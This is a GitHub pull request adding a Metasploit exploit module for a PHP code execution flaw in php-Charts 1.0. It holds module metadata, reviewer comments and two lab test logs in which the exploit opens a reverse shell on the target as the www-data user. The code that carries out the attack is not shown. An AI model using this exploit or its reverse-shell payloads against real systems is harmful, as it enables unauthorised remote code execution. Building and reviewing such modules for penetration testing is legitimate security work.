Add php-Charts v1.0 PHP Code Execution Exploit #1341

Merged
merged 3 commits into from Jan 20, 2013

Projects

None yet

2 participants

@bcoles
Contributor
bcoles commented Jan 20, 2013

Add php-Charts v1.0 PHP Code Execution Vulnerability exploit module

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Jan 20, 2013
modules/exploits/multi/http/php_charts_exec.rb
+ 'Name' => "PHP-Charts v1.0 PHP Code Execution Vulnerability",
+ 'Description' => %q{
+ This module exploits a PHP code execution vulnerability in php-Charts
+ version 1.0 which could be abused to allow users to execute arbitrary
+ PHP code under the context of the webserver user. The 'url.php' script
+ calls eval() with user controlled data from any HTTP GET parameter name.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'AkaStep', # Discovery
+ 'Brendan Coles <bcoles[at]gmail.com>' # msf exploit
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://www.exploit-db.com/exploits/24201/'],
@jvazquez-r7
jvazquez-r7 Jan 20, 2013 Contributor

It's an EDB reference, not URL

@jvazquez-r7
jvazquez-r7 Jan 20, 2013 Contributor

There is also OSVDB reference for this vulnerability: http://www.osvdb.org/show/osvdb/89334 , could you please add the reference?

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Jan 20, 2013
modules/exploits/multi/http/php_charts_exec.rb
+ ['URL', 'http://www.exploit-db.com/exploits/24201/'],
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x22",
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
+ }
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "none"
+ },
+ 'Platform' => 'unix',
@jvazquez-r7
jvazquez-r7 Jan 20, 2013 Contributor

Seems like unix/webapps would be a better location than multi/http for this exploit, please, could you move it?

Or add more targets to really do it a "multi" platform exploit :)

@jvazquez-r7
Contributor

Tested successfully:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > check
[*] 192.168.1.154:80 - Sending check
[+] The target is vulnerable.
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sQkJsNt3VTXIrM6l;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sQkJsNt3VTXIrM6l\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46786) at 2013-01-20 17:11:45 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Once comments are fixed I think we'll be ready to merge it :-)

@jvazquez-r7 jvazquez-r7 merged commit dc318c5 into rapid7:master Jan 20, 2013
@jvazquez-r7
Contributor

Thanks,

Test after changes:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > exploit
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[*] Accepted the first client connection...
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the second client connection...
[*] Command: echo D0GYAZBZleRafqnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "D0GYAZBZleRafqnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46790) at 2013-01-20 17:36:30 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Merged after updating references and disclosure date!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment